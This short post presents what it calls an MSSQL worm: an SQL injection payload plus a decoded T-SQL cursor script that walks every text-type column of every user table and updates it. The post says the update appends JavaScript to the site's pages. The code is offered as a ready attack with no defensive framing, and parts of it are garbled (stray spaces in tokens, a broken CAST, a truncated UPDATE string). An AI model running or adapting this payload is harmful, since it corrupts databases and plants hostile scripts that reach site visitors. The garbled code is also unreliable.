A mssql worm code by ha0k
The following is a hexadecimal conversion. the decoded file is in the lower part. this statement inserts a JS code at the end of each file on the website.
---------------------------------------------------------------------------------
'; DECLARE % 20 @ S % 20 NVARCHAR (4000); SET % 20 @ S = CAST (upper (4000); EXEC (@ S );--
---------------------------------------------------------------------------------
----------------------------------------------------------------------------------
DECLARE @ t varchar (255)
DECLARE @ c varchar (255)
DECLARE Table_Cursor CURSOR
SELECT [A]. [Name], [B]. [Name]
FROM sysobjects AS [A], syscolumns AS [B]
WHERE [A]. [ID] = [B]. [ID] AND
[A]. [XType] = 'U'/* Table (User-Defined) */AND
([B]. [XType] = 99/* NTEXT */OR
[B]. [XType] = 35/* TEXT */OR
[B]. [XType] = 231/* SYSNAME */OR
[B]. [XType] = 167/* VARCHAR */)
OPEN Table_Cursor
Fetch next from Table_Cursor INTO @ T, @ C
WHILE (@ FETCH_STATUS = 0)
BEGIN
EXEC ('update ['+ @ T +'] SET ['+ @ C +'] = RTRIM (CONVERT (VARCHAR, ['+ @ C +']) +''